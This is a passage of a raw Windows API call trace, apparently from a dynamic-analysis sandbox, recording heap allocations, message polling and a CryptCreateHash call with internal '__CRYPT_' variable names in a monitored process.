dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0238.361] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0238.361] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0238.361] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0238.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0238.361] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0238.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0238.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0238.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0238.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0238.362] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0238.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0238.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0238.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0238.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0238.362] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0238.362] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0238.362] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0238.362] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0238.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0238.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0238.363] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0238.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043f0 [0238.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0238.363] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0238.363] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0238.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0238.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0238.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0238.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0238.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0238.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0238.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0238.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0238.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0238.363] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0238.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0238.363] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0238.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0238.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0238.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0238.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0238.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0238.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0238.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0238.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0238.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0238.364] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0238.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0238.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0238.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0238.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0238.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0238.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0238.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0238.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0238.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0238.364] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0238.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0238.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0238.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0238.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0238.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0238.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0238.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0238.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0238.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0238.365] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0238.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0238.365] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0238.365] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0238.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0238.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0238.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0238.365] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0238.366] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0238.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0238.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0238.366] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0238.366] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0238.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04150 [0238.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0238.366] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0238.366] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0238.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0238.366] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0238.366] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0238.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0238.366] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0238.366] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0238.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0238.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0238.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0238.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0238.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0238.367] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0238.367] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0238.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0238.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0238.367] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0238.367] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0238.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0238.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0238.367] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0238.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0238.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0238.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0238.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0238.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0238.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0238.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51538, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0238.368] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0238.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0238.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0238.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0238.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0238.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0238.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0238.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0238.368] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0238.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0238.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0238.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0238.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0238.368] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.368] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0238.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0238.368] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0238.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0238.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0238.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0238.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0238.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0238.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0238.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0238.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0238.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0238.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0238.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0238.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0238.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0238.369] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0238.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0238.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0238.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0238.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0238.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0238.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0238.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0238.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0238.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0238.369] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0238.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0238.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0238.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0238.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0238.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0238.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0238.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0238.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0238.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55048, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0238.370] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0238.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0238.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0238.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0238.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0238.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0238.370] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0238.370] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0238.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0238.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0238.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0238.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0238.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0238.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0238.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0238.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0238.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0238.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0238.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0238.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0238.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0238.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0238.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0238.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0238.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0238.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0238.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0238.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0238.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0238.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0238.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0238.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0238.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0238.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0238.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0238.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0238.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0238.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0238.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0238.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0238.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0238.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 